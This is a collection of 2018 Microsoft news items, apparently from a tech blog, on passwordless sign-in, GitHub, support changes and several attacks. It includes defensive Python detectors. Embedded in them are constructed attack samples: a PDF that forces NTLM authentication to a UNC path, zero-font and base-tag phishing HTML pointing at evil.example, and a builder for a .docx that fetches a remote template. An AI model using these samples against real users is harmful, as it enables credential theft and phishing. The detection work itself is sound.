Passwords May Be Dead Soon If Microsoft Gets Its Way 

Karanbir Singh (a program manager at Microsoft) is on a mission:

Kill the password.

As he said in a recent blog post:

“Nobody likes passwords.  They are inconvenient, insecure, and expensive.  In fact, we dislike them so much that we’ve been busy at work trying to create a world without them–a world without passwords.”

The company’s stated goal is that an end user should never have to deal with passwords on a day-to-day basis, and should instead authenticate with credentials (a key bound to the device, unlocked by a PIN or a biometric) that cannot be phished, replayed or cracked offline the way a password can.

To accomplish this goal, the company is looking at a number of options, including biometrics and multi-factor authentication schemes.

Singh notes that this isn’t just blue-sky thinking, either.  Already, more than 47 million users and more than five thousand businesses are utilizing “Windows Hello for Business.”  Another solution currently in use is the Microsoft Authenticator app, which allows users to access their Microsoft accounts via their smartphones.

Additionally, as part of the Windows 10 April 2018 Update, any user with a Microsoft account or an Azure Active Directory account can sign in to a Windows 10 PC running in S mode without ever entering a password, using the Authenticator app and Windows Hello.

The company is also taking advantage of the newly ratified FIDO2 standard (Fast Identity Online), and is in the process of updating Windows Hello to enable secure authentication across a wider range of scenarios.  For example:  The company is currently working on a proof of concept for shared PCs that will allow users to log on with FIDO2 security keys.  Because the private key never leaves the key itself, employees can carry their credential with them from machine to machine.

They envision a scenario in which any user can simply walk up to any device the organization controls and authenticate without ever having to enter their username or password. This would be especially useful for analysts, help desk personnel, and anyone working in the medical profession.

Obviously no firm timeframes have been given, but as mentioned, some of these technologies are already in use and will be refined in the months ahead.

Microsoft Surpasses Google In Latest Valuation

Microsoft’s stock price is surging, putting the company’s total valuation at $753 billion. This makes it the third most valuable company on the planet, behind Amazon ($782 billion) and Apple ($923 billion), and leaves Google in fourth place, valued at $739 billion.

Google first overtook Microsoft in 2012, and since that time, the two companies have traded places repeatedly. So Microsoft’s current 3rd place position is expected to be relatively short-lived.

It’s worth noting, however, that since Satya Nadella took over for Steve Ballmer, Microsoft’s stock price has more than doubled, the company has moved decisively into some new areas, and has been dramatically refocused.

Some of those changes include:

  • A big emphasis on cloud-based technologies
  • A heavy emphasis on artificial intelligence
  • Big investments in quantum computing
  • Equally large investments in mixed-reality headsets
  • An emphasis on cross-platform technologies

Even more significantly, the company has veered away from two areas that had long been Microsoft staples.  The company has abandoned efforts to develop a Windows-based smartphone, and has moved away from the strategy of putting Windows at the center of everything Microsoft.

Although Google is likely to regain its #3 market cap position in the near future, Microsoft has some important strategic advantages over both Google and Apple that will serve it well in the long run.  The most significant of these is the fact that it has a much more diverse revenue stream.

Google gets some 90 percent of its income from advertising, and Apple gets some 60 percent of its income from the venerable iPhone. Microsoft, based on the most recent quarterly report, is generating 35 percent of its income from the Surface and its gaming division, another 30 percent from its cloud-based services, and a similar percentage from Office and the company’s various productivity tools.

Windows 10 Gets iTunes App For Apple Users

Apple promised that its iTunes app would be available on the Microsoft Store by the end of 2017.  The announcement was greeted with enthusiasm, but unfortunately, the company didn’t meet their own deadline. They cited the need for more time to build a more robust user experience for Windows users.

The wait is finally over, and it’s big news, because some Windows 10 machines (those running in S mode) can only install apps from the Microsoft Store, and prior to this, iTunes was offered as a standalone download only.

The app is fairly sizeable, weighing in at 476.7MB, and is compatible with both x86 and x64 PCs.

A recent Microsoft blog post had this to say about the announcement:

“Now you can download iTunes from Microsoft Store and easily play your favorite music, movies and more – right from your Windows 10 PC.  iTunes is also home to Apple Music, where you can listen ad-free to over 45 million songs and download your favorites to enjoy without using WiFi.  iTunes is free to download, and you can try Apple Music free for three months.  There’s no commitment, and you can cancel anytime.”

One thing to be aware of is that if you already have an older version of iTunes installed on your machine and you download this app, it will automatically replace your older version.  It is recommended, therefore, that you back up your data before downloading the latest.  While it does offer a better user experience, it’s not worth the loss of your existing library of files.

Kudos to both Apple and Microsoft here. Apple for bringing an excellent free app to the Microsoft Store, and Microsoft for continuing to play nice with their longtime rival, and allowing their massive user base the pleasure of enjoying a portion of Apple’s wonderfully robust ecosystem.

Microsoft Purchases GitHub – What Does This Mean For Open Source?

Microsoft just made a big, significant purchase that has raised more than a few eyebrows: it acquired GitHub for a hefty $7.5 billion.

What makes the purchase interesting and potentially troublesome is that Microsoft is the world’s largest proprietary software company, and GitHub is the world’s largest open source hosting service.

The natural question on everyone’s mind then, is what does this mean for open source?  Is it doomed?  Is it soon to go the way of the dinosaur, or will Microsoft hold the reins of power loosely and let open source continue to flourish?

Those are fair questions, especially given that GitHub is used by more than 28 million developers around the world, and is home to more than 85 million code repositories.  In addition to that, the company was built on Git, which is an open source version control software written by Linus Torvalds (the creator of Linux). Its founders have worked hard to develop innovative workflows that have made the hub easy to use and work with.

The fear is that Microsoft will start strangling those developments and insist that GitHub begin using proprietary Microsoft products.  While it’s too early to say for certain, the early indications are encouraging.  Microsoft has stated that GitHub will be allowed to retain its status as an “open platform” and its service will continue to be offered for free.

Having said that, there will be some changes, including the fact that Microsoft will be offering integration between its App Center mobile testing service and projects hosted on GitHub.  This builds on previous collaborations between Microsoft and GitHub.  Last year, GitHub announced that it would support Microsoft’s Git Virtual File System (GVFS), which the company designed for enterprise-sized repositories.

The skeptics are right to be skeptical, but so far, the early indications are positive.  Note that it’s not a done deal just yet.  The merger is subject to regulatory approval in both the US and the EU.

Microsoft Ending Forum Support For Older Operating Systems

Big changes are coming from Microsoft starting in July (exact date unknown), and it has potentially dire implications if you’re using some of the company’s older technology.

Microsoft announced that in July, they’ll no longer provide forum-based support for a wide range of products and software, including:

  • Microsoft Band
  • Zune
  • Surface Pro
  • Surface Pro 2
  • Surface RT
  • Surface 2
  • Microsoft Security Essentials
  • Internet Explorer 10
  • Office 2010
  • Office 2013
  • Windows 7
  • Windows 8.1
  • Windows 8.1 RT

Although the company didn’t cite a specific reason for the change, it seems obvious that this is another move to push people into buying the latest and greatest of the company’s offerings.  Unfortunately for them, the announcement has been met with more than a little hostility, and for good reason.

Consider that the company has pledged to continue to support Windows 7 until January 2020, and Windows 8.1 (and variants) until January 2023.  Given that we’re still quite some distance from those end-of-life dates, closing an important avenue of support for a product the company is still ostensibly supporting seems a bit premature.  Nonetheless, there’s no indication at this time that the company has plans to extend forum support for any of these products beyond July.

In some instances, this won’t prove to be problematic.  Few people still use Internet Explorer 10 as anything more than a curiosity, and Zune was never especially popular, so the loss of those forums isn’t likely to cause much backlash. However, in the case of Windows 7 and 8.1, not only has the company pledged support for years to come, but those products are still actively used by a significant minority around the world, and those users aren’t thrilled with the recent announcement.

In any case, given that the company is unlikely to change course, this is all the more reason to make upgrading a priority if you’re still using any of the products mentioned above.

Hackers Can Use PDF Files To Access Windows Credentials

Security researcher Assaf Baharav from Check Point has discovered a new twist on an old, fairly well-known attack.  He was able to essentially “weaponize” PDFs to leak Windows credentials in the form of NTLM challenge-response hashes, which an attacker can then crack offline or relay to another server.  Unfortunately, no action other than simply opening the PDF is required for the attacker to obtain the hash.

Baharav used the same methodology attackers have relied on for years: the document references a file on an attacker-controlled server by UNC path, the reader (via the PDF’s remote go-to actions) tries to open it over SMB, and Windows transparently answers the server’s authentication challenge with the current user’s NTLM credentials. This forced-authentication trick has already been pulled off from inside web browsers, Windows shortcut files, shared folders, Microsoft Office documents and Microsoft Outlook. Using a PDF to trigger it is something new.
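The following scanner is an added example for this page, not Check Point’s code and not Adobe’s or Foxit’s. It looks for the two ingredients the attack needs inside a PDF: an action that can reach outside the document (GoToR, GoToE, Launch and friends) and a string literal naming a network location (a UNC path, a //server/share file specification, or an smb:/file: URL). Both sample documents are constructed here for illustration; the 10.0.0.5 server and share names are made up.

```python
import re

# Constructed sample for this page (not a real malicious file): a one-page PDF whose
# OpenAction is a /GoToR (remote go-to) whose /F file specification is a UNC path.
# In PDF literal strings a backslash is written "\\", so "\\\\host" means "\\host".
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /GoToR /F (\\\\10.0.0.5\\share\\doc.pdf) /D [0 /Fit] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# A benign control document (also constructed): its only action is an https link.
BENIGN_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 10 10] /A << /S /URI /URI (https://example.com/) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# A PDF literal string: "(" ... ")" with backslash escapes. Nested unescaped parens
# are not handled, which is acceptable for a triage scanner.
PDF_STRING = re.compile(rb"\((?:\\.|[^\\()])*\)", re.DOTALL)

# Action types that can make the reader open something outside the document.
REMOTE_ACTION = re.compile(rb"/S\s*/(GoToR|GoToE|Launch|ImportData|SubmitForm|URI)\b")


def unescape_pdf_string(literal):
    """Drop the parens and resolve simple escapes: a doubled backslash becomes one,
    an escaped paren becomes a paren. Octal and \\n-style escapes are not resolved;
    they are rare in file specifications."""
    return re.sub(rb"\\(.)", rb"\1", literal[1:-1])


def find_remote_references(pdf):
    """Every string literal naming a network location: a UNC path (\\\\server\\share),
    a //server/share file spec, or an smb:/file: URL."""
    hits = []
    for m in PDF_STRING.finditer(pdf):
        value = unescape_pdf_string(m.group(0))
        low = value.lower()
        if value.startswith(b"\\\\") or value.startswith(b"//") or low.startswith((b"smb:", b"file:")):
            hits.append(value.decode("latin-1"))
    return hits


def remote_actions(pdf):
    """Names of the action types in the file that can reach outside the document."""
    return sorted({m.group(1).decode() for m in REMOTE_ACTION.finditer(pdf)})


def is_ntlm_leak_candidate(pdf):
    """True when the file both carries an outbound action and names a network path."""
    return bool(find_remote_references(pdf)) and bool(remote_actions(pdf))


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        print(name, remote_actions(doc), find_remote_references(doc), is_ntlm_leak_candidate(doc))
```

The scanner works on the raw bytes, so run it after decompressing the file (real documents keep most objects in compressed object streams; a tool such as qpdf can expand them first). It is a triage aid, not a replacement for the network-level fix: a PDF that passes this check can still reach a remote host through a path the regex does not recognise.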

Baharav had this to say about his research:

“We chose to test these two high profile readers (Adobe Acrobat and the FoxIT reader).  Regarding the others, we highly suspect they may be vulnerable as well.  We followed a 90-day disclosure policy by notifying only Adobe and Foxit regarding the issues.”

Foxit did not respond to the information Baharav sent, but Adobe did.  Unfortunately, their response was not encouraging.  They simply announced that they had no plans to address the issue, deferring to Windows OS-level mitigations (citing Microsoft Security Advisory ADV170014).

Microsoft released that advisory to provide instructions on how to stop Windows from performing NTLM single sign-on to remote servers.  This is a workable solution, but it has problems.

For starters, it’s not really a patch, but rather the modification of a specific registry key and the implementation of a network isolation policy.  Worse, it’s only applicable to Windows 10 and Windows Server 2016 machines.  People who have older systems are simply left vulnerable.

Be on the alert, then: PDFs can now be used to leak Windows credentials.  The two major readers that were tested are affected, the others are suspected to be, and no help is coming for older systems.  The one mitigation that works regardless of reader or Windows version is to block outbound SMB (TCP port 445) at the network perimeter, so that the forced authentication never reaches the attacker’s server.

New Trick Lets Hackers Bypass Office 365 Email Security

What’s old is new again.

Hackers have recently begun re-deploying a decade-old trick called ‘ZeroFont’ to get around Microsoft’s security filters and deliver phishing and spam emails to Office 365 email accounts.  The gimmick?  Zero-point fonts.

As anyone with even passing familiarity with Office 365 knows, if you’re drafting an email or document, you can change the font size to suit your tastes and preferences.  What few people realize is that in an HTML email the font size can be set to zero (font-size: 0 in the inline style), which renders nothing at all.

Of course, such a move has no practical application in everyday usage, because no one could read a zero-point font.  Hackers, however, can make cunning use of it.  Office 365’s filter extracts all of the text in the message, including the zero-size runs, so the string it analyzes is chopped up by invisible filler and no longer matches the brand names and phrases the filter is looking for.  The recipient, meanwhile, sees only the visible characters: a clean, convincing phishing message.  Since nothing is detected, nothing is marked as malicious, and the message sails right through the security filters.

By itself, the zero-point trick is useful, but not inherently deadly.  Unfortunately, it can be combined with other tricks like Punycode, Unicode lookalike characters or hexadecimal escapes to disguise links and text in what appears to be a totally innocent email.

It gets better (or worse, depending on your point of view).  Just last month, researchers at a company called Avanan discovered that it was possible to use the HTML <base> tag in an email, point it at a malicious site, and have every link in the message written as a harmless-looking relative path.  The filters, which only examined the link fragment itself, would blithely ignore it, while the recipient’s mail client resolved the link against the malicious base address.
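The two tricks above are easy to see in code. The following is an added example written for this page, not Avanan’s tooling and not anything Microsoft ships: a small HTML walker that extracts the text a recipient actually sees (dropping runs styled font-size:0) alongside the text a naive extractor sees, and that resolves every link against the message’s <base> href. Both message bodies are constructed here; the evil.example domain is a placeholder.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Elements that never have a closing tag; they must not be pushed on the element stack.
VOID_TAGS = {"base", "br", "img", "meta", "link", "input", "hr", "area", "col", "embed",
             "source", "track", "wbr", "param"}
ZERO_SIZE = re.compile(r"font-size:0(px|pt|em|%)?(;|$)")


class _MailWalker(HTMLParser):
    """Collects text, <a href> values and the <base href>. With visible_only set, text
    inside any element styled font-size:0 (at any nesting depth) is skipped."""

    def __init__(self, visible_only):
        super().__init__()
        self.visible_only = visible_only
        self.parts = []
        self.links = []
        self.base = None
        self.stack = []        # (tag, is_zero_size) for each open element
        self.hidden_depth = 0  # how many enclosing elements are zero-size

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and a.get("href"):
            self.base = a["href"]
        if tag == "a" and a.get("href") is not None:
            self.links.append(a["href"])
        if tag in VOID_TAGS:
            return
        style = (a.get("style") or "").replace(" ", "").lower()
        zero = bool(ZERO_SIZE.search(style))
        self.stack.append((tag, zero))
        if zero:
            self.hidden_depth += 1

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if not any(t == tag for t, _ in self.stack):
            return  # stray close tag: ignore rather than unwinding the stack
        while self.stack:
            t, zero = self.stack.pop()
            if zero:
                self.hidden_depth -= 1
            if t == tag:
                break

    def handle_data(self, data):
        if self.visible_only and self.hidden_depth:
            return
        self.parts.append(data)


def _walk(html, visible_only):
    w = _MailWalker(visible_only)
    w.feed(html)
    w.close()
    return w


def extract_text(html, visible_only):
    """visible_only=False is what a naive filter reads; True is what the recipient reads."""
    return re.sub(r"\s+", " ", "".join(_walk(html, visible_only).parts)).strip()


def zero_font_mismatch(html):
    """True when hidden zero-size text changes what an extractor sees."""
    return extract_text(html, False) != extract_text(html, True)


def resolved_links(html):
    """Every href resolved the way a mail client would, honouring <base href>."""
    w = _walk(html, False)
    return [urljoin(w.base, h) if w.base else h for h in w.links]


# Constructed samples (placeholders, not captured mail).
ZEROFONT_SAMPLE = (
    '<p>Your <span style="font-size:0">qwk</span>Micro'
    '<span style="font-size: 0px;">zz</span>soft account needs verification.</p>'
)
BASESTRIKER_SAMPLE = (
    '<html><head><base href="https://evil.example/"></head>'
    '<body><a href="login/verify">Verify now</a></body></html>'
)

if __name__ == "__main__":
    print(extract_text(ZEROFONT_SAMPLE, False))   # what the filter sees
    print(extract_text(ZEROFONT_SAMPLE, True))    # what the user sees
    print(resolved_links(BASESTRIKER_SAMPLE))
```

A mail filter that compares the two extractions (or simply scores the visible text rather than the raw text) is not fooled by the zero-size filler, and one that resolves links before scanning them sees the real destination rather than a relative path.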

Again, it should be noted that these tricks aren’t new.  They’ve been around for years, fell out of favor in preference for newer techniques, and now are being recycled.  Apparently, they’re so old that they skate right past modern security flags and filters.

Expect updates soon to catch these types of things, but in the short run, just be aware these types of attacks are not only possible, but trivial to execute.

Turn Cortana Off At Lock Screen To Avoid Potential Hack

Do you use Cortana?  It’s a handy virtual assistant (like Siri) built into Windows 10.  Unfortunately, as useful as she is, there’s a problem. Even if you don’t use Cortana yourself, take heed:  Microsoft has recently issued a security update based on findings by McAfee researchers.

It turns out that Cortana can be “summoned” from the lock screen of your PC and used to mount an attack: the ever-helpful assistant will search the file index, which includes files from a freshly inserted USB drive, and then launch what it finds.

To accomplish the attack, the hacker would need physical access to the PC. Once they had that, they could launch a PowerShell script from the locked screen to reset your Windows 10 password, which would then give them unfettered access.

The vulnerability takes advantage of two things:  First, Cortana “listens” for commands, even while the PC is locked. Then, the OS indexes files constantly so that they’re ready to use at a moment’s notice.  Put those two elements together and you have the makings of a disaster.

Microsoft has rushed a patch out the door to address the issue (CVE-2018-8140, fixed in the June 2018 security updates). For now, the company is advising users to simply disable Cortana on the lock screen, so that your PC has to be unlocked in order for her to be active.  It’s probably good advice, given that not all companies update their OS as soon as patches are available, and this one is important.

To be safe, even if you don’t use Cortana, open Settings, go to Cortana, and turn off “Use Cortana even when my device is locked.”  On a domain, the Group Policy setting “Allow Cortana above lock screen” (Computer Configuration, Administrative Templates, Windows Components, Search) does the same for every PC at once.  Then, when you’re away from your PC, at least that’s one less thing you have to worry about.

Unfortunately, this isn’t the first Cortana-related security issue we’ve seen, and it’s not likely to be the last.  As useful as the feature is, it does open the door to a number of other (potential) problems.  Stay vigilant.

Watch Out For Rise In Microsoft Office Attacks 

Menlo Security has recently published a new report that will probably dismay you if you’re a business owner.

Microsoft Office has been named as the attack vector of choice for hackers around the world. The most common form of the attack is a malicious Word document or other office document attached to an innocent looking email.

There are, of course, plenty of other ways to take advantage of various security weaknesses in MS Office and Office 365.  These include documents that, when opened, fetch a remotely hosted component (an embedded OLE object, a linked frame or an attached template pointing at an attacker’s server) which then delivers the exploit.  Because the payload lives on the server rather than in the attachment, there is nothing in the file itself for an email gateway to scan.
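Those remote components are declared in the document’s relationship files, which is where a gateway or responder can look for them. The code below is an added example for this page, not Menlo Security’s tooling and not anything from Microsoft Office: it opens a .docx (a zip of XML parts), lists every relationship marked TargetMode="External", and flags those that are not ordinary clickable hyperlinks, since an external attached template, OLE object, frame or image is fetched automatically when the file opens. The sample document is built in memory here for illustration; the 203.0.113.7 address is a documentation-range placeholder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def external_relationships(docx_bytes):
    """(rels part, relationship kind, target) for every relationship with TargetMode="External"."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, kind, rel.get("Target", "")))
    return found


def remote_payload_candidates(docx_bytes):
    """External relationships that Word resolves on open (template, OLE, frame, image...).
    Plain hyperlinks are external too, but only fire when the user clicks them."""
    return [r for r in external_relationships(docx_bytes) if r[1] != "hyperlink"]


# --- constructed sample document (illustration only, not a real malicious file) ---
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
)
DOCUMENT_XML = (
    f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>Invoice attached</w:t></w:r></w:p>'
    '</w:body></w:document>'
)
# settings.xml points at an attached template by relationship id; the rels part says where it lives.
SETTINGS_XML = f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}"><w:attachedTemplate r:id="rId1"/></w:settings>'
SETTINGS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS[1:-1]}">'
    f'<Relationship Id="rId1" Type="{R_NS}/attachedTemplate" Target="__TARGET__" TargetMode="External"/>'
    '</Relationships>'
)
# A normal clickable hyperlink, present so the noise filter has something to discard.
DOCUMENT_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS[1:-1]}">'
    f'<Relationship Id="rId1" Type="{R_NS}/hyperlink" Target="https://www.microsoft.com/" TargetMode="External"/>'
    '</Relationships>'
)


def build_sample_docx(template_target):
    """Minimal .docx whose attached template is fetched from template_target on open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", DOCUMENT_XML)
        z.writestr("word/settings.xml", SETTINGS_XML)
        z.writestr("word/_rels/settings.xml.rels", SETTINGS_RELS.replace("__TARGET__", template_target))
        z.writestr("word/_rels/document.xml.rels", DOCUMENT_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx("http://203.0.113.7/invoice.dotm")
    for hit in remote_payload_candidates(doc):
        print("remote component:", hit)
```

The same check applies to .xlsx and .pptx, since all Office Open XML packages declare their parts the same way; legacy binary .doc files need a different parser. A document that legitimately needs an external template is rare enough in most environments that every hit is worth a look.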

The reason MS Office is such a wildly popular choice isn’t because it has an unusual number of security loopholes that can be exploited (although it’s certainly got its share).  Rather, it has everything to do with the overwhelming popularity of the office suite.  Simply put, lots of people use it on a regular basis, and that means the pool of potential victims is enormous.

As the report explains:

“There is likely to be an increase in attacks via malevolent email attachments using stealthily embedded, remotely hosted malicious components that leverage applications and operating system vulnerabilities, both old and new.

With CVE-2018-8174 and CVE-2018-5002, the attackers leveraged Word as a vector to exploit Adobe Flash Player and Internet Explorer.  By using Word as the vector, the attackers were able to exploit a browser, even if it is not the default browser, and exploit Flash, even though Flash is blocked by most enterprises…Microsoft is therefore undoubtedly going to become the platform that attackers leverage most to deliver their zero-day exploits.”

All true, and beyond troubling.  If your business uses Microsoft Office or Office 365 (and odds are excellent that it does), continued vigilance is the key: keep Office and Windows patched, and treat any document that reaches out to a remote server the moment it is opened as hostile.